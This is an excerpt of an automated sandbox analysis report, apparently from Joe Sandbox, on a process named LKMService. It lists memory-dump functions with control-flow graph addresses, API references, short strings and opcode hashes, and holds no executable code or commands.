                  • Instruction ID: c3506ecbd02c800b6d2756277a2ca60dc9fa3c489bce628da4396f228f851e11
                  • Opcode Fuzzy Hash: 22b9b7186cf77ef8e3a4cc867243c89c2dbe6040cba2a0a03b8661d4653cccc6
                  • Instruction Fuzzy Hash: E32125B1D003499FDB10CFAAD980ADEFBF4FF48310F20842AE519A3200C775A910CBA1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2569 49b6230-49b62c0 NtAllocateVirtualMemory 2572 49b62c9-49b62ee 2569->2572 2573 49b62c2-49b62c8 2569->2573 2573->2572
                  APIs
                  • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 049B62B3
                  Memory Dump Source
                  • Source File: 00000002.00000002.4673956517.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_49b0000_LKMService.jbxd
                  Similarity
                  • API ID: AllocateMemoryVirtual
                  • String ID:
                  • API String ID: 2167126740-0
                  • Opcode ID: 0a5358531f1deef87d7dea1d32d2136f12ef8277c225ba62bdb64a396d8e6cbf
                  • Instruction ID: ba4d98004ab9bf26f81db14de029a48f252082007950f25b7f125e1b04229c5c
                  • Opcode Fuzzy Hash: 0a5358531f1deef87d7dea1d32d2136f12ef8277c225ba62bdb64a396d8e6cbf
                  • Instruction Fuzzy Hash: 242114B19003099FDB10DFAAC881ADEFBF5FF48310F10842AE519A7210C775A950CBA5

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2709 9e9187-9e91aa 2711 9e91ac-9e9242 2709->2711 2717 9e9267-9e9284 2711->2717 2718 9e9244-9e9247 2711->2718 2720 9e928a-9e928e 2717->2720 2718->2717 2719 9e9249-9e925f 2718->2719 2719->2717 2722 9e9294-9e929f 2720->2722 2725 9e92a5-9e92d4 2722->2725 2726 9e9580-9e9587 2722->2726 2728 9e92da-9e92f8 2725->2728 2729 9e9535-9e954c 2725->2729 2726->2711 2727 9e958d-9e9593 2726->2727 2728->2725 2730 9e92fa-9e9333 2728->2730 2729->2725 2731 9e9552-9e9560 2729->2731 2730->2729 2732 9e9339-9e9378 2730->2732 2731->2726 2733 9e9562-9e9578 2731->2733 2732->2729 2734 9e937e-9e938c 2732->2734 2733->2726 2734->2725 2735 9e9392-9e9401 2734->2735 2735->2711 2741 9e9407-9e945d 2735->2741 2744 9e9502-9e9509 2741->2744 2744->2711 2745 9e950f-9e9528 2744->2745 2746 9e952e 2745->2746 2747 9e9462-9e94ad 2745->2747 2746->2729 2748 9e9594-9e95ad 2747->2748 2749 9e94b3-9e94d6 2747->2749 2752 9e95af-9e95cb 2748->2752 2753 9e9623-9e9669 2748->2753 2749->2725 2750 9e94dc-9e94fb 2749->2750 2750->2744 2754 9e95d0-9e95dd 2752->2754 2759 9e966b-9e967f 2753->2759 2760 9e96b7-9e96bd 2753->2760 2755 9e95e3-9e95f4 2754->2755 2756 9e97c0-9e97d1 2754->2756 2758 9e95f7-9e960c 2755->2758 2756->2754 2761 9e97d7-9e97dd 2756->2761 2764 9e9612-9e961e 2758->2764 2765 9e9763-9e976a 2758->2765 2759->2755 2766 9e9685-9e9689 2759->2766 2760->2754 2763 9e96c3-9e96d4 2760->2763 2762 9e97e3-9e97ef 2761->2762 2762->2758 2767 9e97f5-9e9804 2762->2767 2768 9e96d6-9e96f8 2763->2768 2769 9e9744-9e974a 2763->2769 2764->2753 2771 9e9839-9e988b call 9e8fe0 2764->2771 2765->2758 2770 9e9770-9e978f 2765->2770 2772 9e968f-9e96a6 2766->2772 2773 9e979b-9e97a7 2766->2773 2774 9e980c-9e980f 2767->2774 2775 9e9806-9e9808 2767->2775 2768->2769 2776 9e96fa-9e9736 2768->2776 2769->2754 2777 9e9750-9e975d 2769->2777 2770->2764 2778 9e9795 2770->2778 2772->2754 2780 9e96ac-9e96b2 2772->2780 2773->2754 2779 9e97ad-9e97b1 2773->2779 2783 9e9819 2774->2783 2785 9e9811-9e9818 2774->2785 2782 9e980a 2775->2782 2775->2783 2776->2754 2784 9e973c-9e9742 2776->2784 2777->2765 2778->2773 2779->2762 2786 9e97b3-9e97b9 2779->2786 2780->2773 2782->2785 2788 9e981e-9e9832 2783->2788 2784->2773 2786->2788 2789 9e97bb 2786->2789 2788->2771
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID: 1O^
                  • API String ID: 0-971112054
                  • Opcode ID: 1472ac6dd0369d64a0750b7e03b30cef0c0de85b8057b841d22b0d8df0fcd3bd
                  • Instruction ID: 32e41410d66740aaec77ca85bc067af8d24613ba201984d2e914cb7e3114a208
                  • Opcode Fuzzy Hash: 1472ac6dd0369d64a0750b7e03b30cef0c0de85b8057b841d22b0d8df0fcd3bd
                  • Instruction Fuzzy Hash: 55B10775E00209AFCB55DFAAD450AADB7F6FF99300B14C1AAD425EB355EB389A05CF00

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2915 9ec1a9-9ec1c1 2916 9ec1c3-9ec1d0 call 9ea0a8 2915->2916 2919 9ec1d5-9ec215 call 9e9a30 2916->2919 2924 9ec218-9ec248 call 9e9a30 2919->2924 2927 9ec24a-9ec268 call 9e9a30 2924->2927 2927->2919 2930 9ec26e-9ec28d 2927->2930 2930->2927 2932 9ec28f-9ec293 2930->2932 2933 9ec295-9ec29b 2932->2933 2934 9ec2e1-9ec2e7 2932->2934 2933->2924 2935 9ec2a1-9ec2c8 2933->2935 2934->2916 2936 9ec2ed-9ec2fc 2934->2936 2935->2934 2939 9ec2ca-9ec2db 2935->2939 2950 9ec2ff call 9ec3d8 2936->2950 2951 9ec2ff call 9ec3c8 2936->2951 2952 9ec2ff call 9ec480 2936->2952 2953 9ec2ff call 9ec450 2936->2953 2938 9ec305-9ec335 2942 9ec37a-9ec380 2938->2942 2943 9ec337-9ec33d 2938->2943 2939->2934 2942->2924 2944 9ec386-9ec3ba 2942->2944 2943->2919 2945 9ec343-9ec374 2943->2945 2944->2934 2948 9ec3c0-9ec3c7 2944->2948 2945->2942 2950->2938 2951->2938 2952->2938 2953->2938
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID: 3G.
                  • API String ID: 0-3978388015
                  • Opcode ID: 5b8ebd5f6db857f5aeed1fbddbf6236ea032859d06fa6f3081c9b7d54b2eeede
                  • Instruction ID: 352b58406a8a96178fa6da2120b9ef91cf4131edf89a879e173c4fc2695e58a0
                  • Opcode Fuzzy Hash: 5b8ebd5f6db857f5aeed1fbddbf6236ea032859d06fa6f3081c9b7d54b2eeede
                  • Instruction Fuzzy Hash: 7D51D373E102648FCB19DFA9C49459D77A6AF9931175640BAEC06FB362DA35CC41CBC0

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2954 9ec1b8-9ec1c1 2955 9ec1c3-9ec1d0 call 9ea0a8 2954->2955 2958 9ec1d5-9ec215 call 9e9a30 2955->2958 2963 9ec218-9ec248 call 9e9a30 2958->2963 2966 9ec24a-9ec268 call 9e9a30 2963->2966 2966->2958 2969 9ec26e-9ec28d 2966->2969 2969->2966 2971 9ec28f-9ec293 2969->2971 2972 9ec295-9ec29b 2971->2972 2973 9ec2e1-9ec2e7 2971->2973 2972->2963 2974 9ec2a1-9ec2c8 2972->2974 2973->2955 2975 9ec2ed-9ec2fc 2973->2975 2974->2973 2978 9ec2ca-9ec2db 2974->2978 2989 9ec2ff call 9ec3d8 2975->2989 2990 9ec2ff call 9ec3c8 2975->2990 2991 9ec2ff call 9ec480 2975->2991 2992 9ec2ff call 9ec450 2975->2992 2977 9ec305-9ec335 2981 9ec37a-9ec380 2977->2981 2982 9ec337-9ec33d 2977->2982 2978->2973 2981->2963 2983 9ec386-9ec3ba 2981->2983 2982->2958 2984 9ec343-9ec374 2982->2984 2983->2973 2987 9ec3c0-9ec3c7 2983->2987 2984->2981 2989->2977 2990->2977 2991->2977 2992->2977
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID: 3G.
                  • API String ID: 0-3978388015
                  • Opcode ID: 1f9fee0b3d46c1a4e2c6a96caa9748d823deb2d3f91eeee9d30f49e74e9a6485
                  • Instruction ID: 89899d221ac13e6f8723f067d2a86fe84244207b7f980a96afdf4f08c749cdb5
                  • Opcode Fuzzy Hash: 1f9fee0b3d46c1a4e2c6a96caa9748d823deb2d3f91eeee9d30f49e74e9a6485
                  • Instruction Fuzzy Hash: 0D51C177F101248FCB18DFA9C4945AEB6A6AF98351B5641A9EC06FB361DB35CC41CBC0
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 265db05a0e6d5f9495aa1b932ec6de3802897f0668e9a2ff6ed522a186d9308b
                  • Instruction ID: 50d7b104786b84c970d65803dff6d9267f88ec7750f09a9d8bcd28104967765b
                  • Opcode Fuzzy Hash: 265db05a0e6d5f9495aa1b932ec6de3802897f0668e9a2ff6ed522a186d9308b
                  • Instruction Fuzzy Hash: B1020171B003558FCB55CFB9D8D469EBBE2AF89300B5581BAE409EB362DB749C46CB40
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b729d291ef701734475404376d4e946c9b7319b95923f78dd7ab3d33c0486411
                  • Instruction ID: 85aa43d1f9dcdd3e0736a06142f6f33412c9349576a7359ea54c3772e4c2fc92
                  • Opcode Fuzzy Hash: b729d291ef701734475404376d4e946c9b7319b95923f78dd7ab3d33c0486411
                  • Instruction Fuzzy Hash: 82A1E171B103598FCB15DF79D8D069DBBB2AF99300F55816AE009EB362EB74AC49CB40
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8444e207e4785f095c1d4a33d03e12a72e93bd47b44a654e7a381c0505b7c98b
                  • Instruction ID: 046519279a951cc8779b8df03541ab03ea292dec7de6a2a2bc105ee648f2d060
                  • Opcode Fuzzy Hash: 8444e207e4785f095c1d4a33d03e12a72e93bd47b44a654e7a381c0505b7c98b
                  • Instruction Fuzzy Hash: 6E315C77F105394B8714CEAEDC901AEB2E6AB8426070A813ADC46FB751DA74CC09C7D0

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2854 9ee100-9ee109 2855 9ee10c-9ee11e call 9e98a0 2854->2855 2858 9ee121-9ee12d call 9eab78 2855->2858 2860 9ee132-9ee140 2858->2860 2860->2855 2861 9ee142-9ee163 2860->2861 2863 9ee169-9ee16f 2861->2863 2864 9ee1e6-9ee1ec 2861->2864 2863->2858 2865 9ee171-9ee1d8 call 9e8fe0 2863->2865 2864->2855 2866 9ee1f2-9ee200 2864->2866 2865->2858 2890 9ee1de-9ee1e5 2865->2890 2869 9ee202-9ee252 call 9e8fe0 2866->2869 2870 9ee253-9ee259 2866->2870 2870->2858 2872 9ee25f-9ee26d 2870->2872 2876 9ee26f-9ee278 2872->2876 2877 9ee2c0-9ee2e1 2872->2877 2880 9ee282-9ee284 2876->2880 2877->2880 2893 9ee2e3-9ee2e9 2877->2893 2886 9ee28a-9ee2bf call 9e8fe0 2880->2886 2893->2886 2895 9ee2eb-9ee2f8 2893->2895 2898 9ee2fa-9ee308 call 9e8fa0 2895->2898 2903 9ee30a-9ee31d 2898->2903 2904 9ee34b-9ee357 2898->2904 2903->2898 2906 9ee31f-9ee339 2903->2906 2906->2904 2909 9ee33b-9ee347 2906->2909 2910 9ee358-9ee37f 2909->2910 2911 9ee349 2909->2911 2911->2898
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID: %A?T
                  • API String ID: 0-4079540278
                  • Opcode ID: b064dd8dc5f2fb89a18dbf3d1f9b91ef6d50805ac42b49185a6456030e959d8a
                  • Instruction ID: 92fe225e43c5c1eecacca9152f6f4beb57e0b757292ec817a0050a4ff5ce9ab9
                  • Opcode Fuzzy Hash: b064dd8dc5f2fb89a18dbf3d1f9b91ef6d50805ac42b49185a6456030e959d8a
                  • Instruction Fuzzy Hash: 35711531F001548FCB19EBAAC89449EBBF6AFC93107294069D909EB366CB349D05CBA1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2993 9e8d68-9e8db4 2997 9e8dbc-9e8dcd 2993->2997 2997->2997 2998 9e8dcf-9e8e18 call 9e9028 2997->2998 3018 9e8e1b call 49b5538 2998->3018 3019 9e8e1b call 9ebe18 2998->3019 3020 9e8e1b call 9ec1b8 2998->3020 3021 9e8e1b call 49b2df0 2998->3021 3022 9e8e1b call 9ee0f2 2998->3022 3023 9e8e1b call 9e9a30 2998->3023 3024 9e8e1b call 9ed950 2998->3024 3025 9e8e1b call 9eaeb0 2998->3025 3026 9e8e1b call 9ed690 2998->3026 3027 9e8e1b call 9ea170 2998->3027 3028 9e8e1b call 9ebe08 2998->3028 3029 9e8e1b call 9ecf48 2998->3029 3030 9e8e1b call 9ec1a9 2998->3030 3031 9e8e1b call 49b2de2 2998->3031 3032 9e8e1b call 49b0040 2998->3032 3033 9e8e1b call 9e9a20 2998->3033 3034 9e8e1b call 9ee100 2998->3034 3035 9e8e1b call 9e0a81 2998->3035 3036 9e8e1b call 9ed941 2998->3036 3037 9e8e1b call 9ea161 2998->3037 3001 9e8e1d-9e8e1f 3001->2998 3002 9e8e21-9e8e31 3001->3002 3002->2997 3004 9e8e33-9e8ec2 3002->3004 3009 9e8ed7-9e8ede 3004->3009 3009->3009 3010 9e8ee0-9e8eea 3009->3010 3012 9e8eec-9e8f01 3010->3012 3013 9e8ec4-9e8ed1 3010->3013 3016 9e8f02 3012->3016 3013->3009 3016->3016 3018->3001 3019->3001 3020->3001 3021->3001 3022->3001 3023->3001 3024->3001 3025->3001 3026->3001 3027->3001 3028->3001 3029->3001 3030->3001 3031->3001 3032->3001 3033->3001 3034->3001 3035->3001 3036->3001 3037->3001
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID: t~t
                  • API String ID: 0-1248721091
                  • Opcode ID: 44ed23f64e2e986b96481053c0ec89688f2a228b8de89d09f059f1d8b55ed96c
                  • Instruction ID: 820d4d045ff4dfd20aafa1ac821e9d4fb841241c1cf05b604f98f0e1f68d56b0
                  • Opcode Fuzzy Hash: 44ed23f64e2e986b96481053c0ec89688f2a228b8de89d09f059f1d8b55ed96c
                  • Instruction Fuzzy Hash: 60418034B00745CFCB19DFA9C49495EBBB2FF89310B148569E809AB362DB75EC42CB80
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID: t~t
                  • API String ID: 0-1248721091
                  • Opcode ID: b7877936f27ece95b309cc3fa05e8f3f83d9b63ce3749f65766a06d22a5458e7
                  • Instruction ID: a8d8698780536c4ecb24003ff1c2235b7138bec7935f8b875f83c0aa3c73fd2e
                  • Opcode Fuzzy Hash: b7877936f27ece95b309cc3fa05e8f3f83d9b63ce3749f65766a06d22a5458e7
                  • Instruction Fuzzy Hash: 5201C075B052848FCB16DB69D8518AFBBB6BFCA314B1444BAD408E7362DB319C45CBE0
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID: t~t
                  • API String ID: 0-1248721091
                  • Opcode ID: 4da8578995bc6c5997ff63e242762bb7639b9f7c95a7db7918c3f54294a0b0cc
                  • Instruction ID: d6963d0c7df86243e0b3ed1f894992b80507e2e8c532b504b346cf604e35af05
                  • Opcode Fuzzy Hash: 4da8578995bc6c5997ff63e242762bb7639b9f7c95a7db7918c3f54294a0b0cc
                  • Instruction Fuzzy Hash: EB017C75B002148F8B19DBAAD8419AFB7B6FBC9320B104579E918A7351DB31AC41CBD0
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 24d2c5463219761e391c5c50148e092ad684425f706ce02078cad7838ccf2602
                  • Instruction ID: fe2e91b217f2f5d281face2727baec9543e223ee99720813e13e992e3a2c8768
                  • Opcode Fuzzy Hash: 24d2c5463219761e391c5c50148e092ad684425f706ce02078cad7838ccf2602
                  • Instruction Fuzzy Hash: 1F613B31304284DFDB16DF29C890BAE7BA2EF85310F14846EE5568B392DB76EC46CB50
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a4193cf0b87c1c0fa4d25172475c74a941bed3cff68dbb3b56811fd8ab72cfc8
                  • Instruction ID: 19419107085b47583c563efb74d26150e6742bd8ee1f4bddb393123e3ae85fd6
                  • Opcode Fuzzy Hash: a4193cf0b87c1c0fa4d25172475c74a941bed3cff68dbb3b56811fd8ab72cfc8
                  • Instruction Fuzzy Hash: F051C331300244DFEB16DF29C894BAE77A2EF84310F14886DE55A9B392DB76EC46CB50
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d4196ad00fa78c99bea23d177cdae4498b5e7e03b147c8e5f709b0db0962f852
                  • Instruction ID: aac63050601007a7e3586f63fe823ab8179cad7495aefc246d42edb9e4861441
                  • Opcode Fuzzy Hash: d4196ad00fa78c99bea23d177cdae4498b5e7e03b147c8e5f709b0db0962f852
                  • Instruction Fuzzy Hash: 0F61B5313002449FEB1A9F65C854B6E77A6EFC8310F14846DE91A9B396DF75EC02CB90
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8af05ece7d0a692ef2af5881b31cd3a1dc8560ee9cf7963fb96693ca85fbfd23
                  • Instruction ID: 377654398402b190ea7f260e9319e5b7dafbd373f32cb3cc382b68c1f3ae41ef
                  • Opcode Fuzzy Hash: 8af05ece7d0a692ef2af5881b31cd3a1dc8560ee9cf7963fb96693ca85fbfd23
                  • Instruction Fuzzy Hash: 9741E4663083D44FC71AA33D6C2406D7F96CEC262131948BFE18EDB283CE199D0783A6
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 52d83fe51cc4993dd0150594d174de20eed46d9e37691ef8cd6392d2b3abaa32
                  • Instruction ID: f2fa0f4eb894f5949325c32b0c497d0375a6dcfcdae3a8d67790ddc93b665cc7
                  • Opcode Fuzzy Hash: 52d83fe51cc4993dd0150594d174de20eed46d9e37691ef8cd6392d2b3abaa32
                  • Instruction Fuzzy Hash: 6D412872E002688FDB05DF59D88479DBAF6AB88310F254156D901BB3A0CB75AC44CBD0
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e98ee94297563cf5557f0a14d147879ca71bdd8229cf3daea7defbb9bda827a5
                  • Instruction ID: 0419422b8739267ab282a48dee4b01842cd56f219b98e55c434b0eb1f68c08be
                  • Opcode Fuzzy Hash: e98ee94297563cf5557f0a14d147879ca71bdd8229cf3daea7defbb9bda827a5
                  • Instruction Fuzzy Hash: 2B412E34A10649CFCB19DFA9C484A5EBBB2BF98314F148469E5099B361DB75EC86CB40
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 38795d185f70942c1747cec574669d0ba2f189dde3f1f2f44ea00b3dac20537a
                  • Instruction ID: 71795e3c632d53264d70d655d7729165d4aa63c83e555a58e297777607b1d463
                  • Opcode Fuzzy Hash: 38795d185f70942c1747cec574669d0ba2f189dde3f1f2f44ea00b3dac20537a
                  • Instruction Fuzzy Hash: B9313873E012659FCB159FB89804499BBB2BB8532035A82BEEC05E7751C73ADC51CBC0
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 77e7445434d053f62378b3cc73d2bf82a9ba70e01ae34f9ce25152a1fe2770dd
                  • Instruction ID: 44b183cf87db886d8c21e1c06db50b283326ae248e0c94ee0577ed6f4ee29bad
                  • Opcode Fuzzy Hash: 77e7445434d053f62378b3cc73d2bf82a9ba70e01ae34f9ce25152a1fe2770dd
                  • Instruction Fuzzy Hash: B5212673E016299B8B059EB9D80449AB7B2BB8536035A82ADEC09F7750C77ADC41CBC0
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: be4914e1b34ac3a5537d2e65095d750ad88dbdea092c3059f5725032d16f240a
                  • Instruction ID: acbecffc90a8ff76e78573eb78b0041e7837422887b3dd2b45d9e8c860b5d908
                  • Opcode Fuzzy Hash: be4914e1b34ac3a5537d2e65095d750ad88dbdea092c3059f5725032d16f240a
                  • Instruction Fuzzy Hash: FF21F7B190C3D58FCB16CB69DC644BE7BB4AF45300F1405AAE481AB2A2D7349C06C7A1
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8b5e905346e4c51821e7f764757bedd2a6f9ac8570f6a810583b75fee2d6d23f
                  • Instruction ID: c6edaca64e855a8f55c2874c7d6dcdaaddfa317cc0bb7128ec728d93c36d80dd
                  • Opcode Fuzzy Hash: 8b5e905346e4c51821e7f764757bedd2a6f9ac8570f6a810583b75fee2d6d23f
                  • Instruction Fuzzy Hash: 5821C731F04158CF8B15DBBAD89589DBBF6BF893107654469E905FB321CB359C40CBA1
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 04afdd2fcc037700d755466d350646db97fa16df4e0f40594c644762f6052f9d
                  • Instruction ID: b0a5348602ad2b5155eed65918109647871e73b306ebce3f2d60fcd4b883885f
                  • Opcode Fuzzy Hash: 04afdd2fcc037700d755466d350646db97fa16df4e0f40594c644762f6052f9d
                  • Instruction Fuzzy Hash: 410175A73401A5574A5A727E385157E228BCBC667235C047EF29DEB382CE1A9D0703E6
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8bab2f44174d1d9d1c96210dba9b21ed4d32f93b52fc819dfd1030002e29f9b8
                  • Instruction ID: b96a588a47166916bb36edf655e323c21944a9e3116c4010dfaa416aba2e748f
                  • Opcode Fuzzy Hash: 8bab2f44174d1d9d1c96210dba9b21ed4d32f93b52fc819dfd1030002e29f9b8
                  • Instruction Fuzzy Hash: 81118E36B212258F8754DF7DC89495ABBF6AF8921531640B9E906EB371EB30EC01CB90
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d3cace08530cdcbf418f63346faeb45ef269d9e6529f43366ce42ed8e283bd4d
                  • Instruction ID: a0307047c365f85b5498efc7ef41117131b1a6c6aeb39ce2b6d121f51010d063
                  • Opcode Fuzzy Hash: d3cace08530cdcbf418f63346faeb45ef269d9e6529f43366ce42ed8e283bd4d
                  • Instruction Fuzzy Hash: 9811AD353042909FC3419B69D84485ABBA6EFC672030684BAE548CB362CA61EC02CBA1
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 160ea60fea64345e56d2530d0530efd779db53b46213cc2364fbcae86cf39ab4
                  • Instruction ID: fea9e23bc47821bcf2d3ae11c6ae667a8cbffa86c3ccf66e02a1f1006ca9e01c
                  • Opcode Fuzzy Hash: 160ea60fea64345e56d2530d0530efd779db53b46213cc2364fbcae86cf39ab4
                  • Instruction Fuzzy Hash: 5011E3B1E04169DBCF15DBAAD8449BFB7B9FB84350F100929E951AB390DB709D02CBD1
                  Memory Dump Source
                  • Source File: 00000002.00000002.4657277683.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_73d000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cc8d2e21fa2e56df04f4fc84e14f5f4fd3939e794e17e2e5975b8cbbc35f7995
                  • Instruction ID: fe02765b64f37e034555cde88a49bc945661ac3fbba88b5d6eea4a4976092fe4
                  • Opcode Fuzzy Hash: cc8d2e21fa2e56df04f4fc84e14f5f4fd3939e794e17e2e5975b8cbbc35f7995
                  • Instruction Fuzzy Hash: 9C01F2714093449AF7208A65E984B27FF98FF81764F18841AED081A293C7BCDC40C6B1
                  Memory Dump Source
